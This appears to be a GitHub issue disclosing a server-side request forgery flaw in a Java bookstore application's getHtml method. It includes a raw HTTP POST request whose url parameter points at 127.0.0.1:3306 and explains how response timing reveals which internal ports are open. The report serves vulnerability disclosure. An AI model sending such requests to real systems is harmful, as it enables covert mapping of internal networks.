You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Code Audit:
The getHtml method in src/main/java/org/zdd/bookstore/rawl/HttpUtil. java does not filter the incoming URL parameters, allowing attackers to determine whether the internal network service is enabled based on the response time
Vulnerability exploitation:
Data packet:
POST /write HTTP/1.1
Host: 192.168.0.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=EFC9E8518CFE03C75919C813FA660442
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
url=http://127.0.0.1:3306
Local port 3306 is open and responds quickly
Local port 3307 is not turned on, with a response time of at least 2 seconds or more
The text was updated successfully, but these errors were encountered:
Code Audit:
The getHtml method in src/main/java/org/zdd/bookstore/rawl/HttpUtil. java does not filter the incoming URL parameters, allowing attackers to determine whether the internal network service is enabled based on the response time
Vulnerability exploitation:
Data packet:
Local port 3306 is open and responds quickly
Local port 3307 is not turned on, with a response time of at least 2 seconds or more
The text was updated successfully, but these errors were encountered: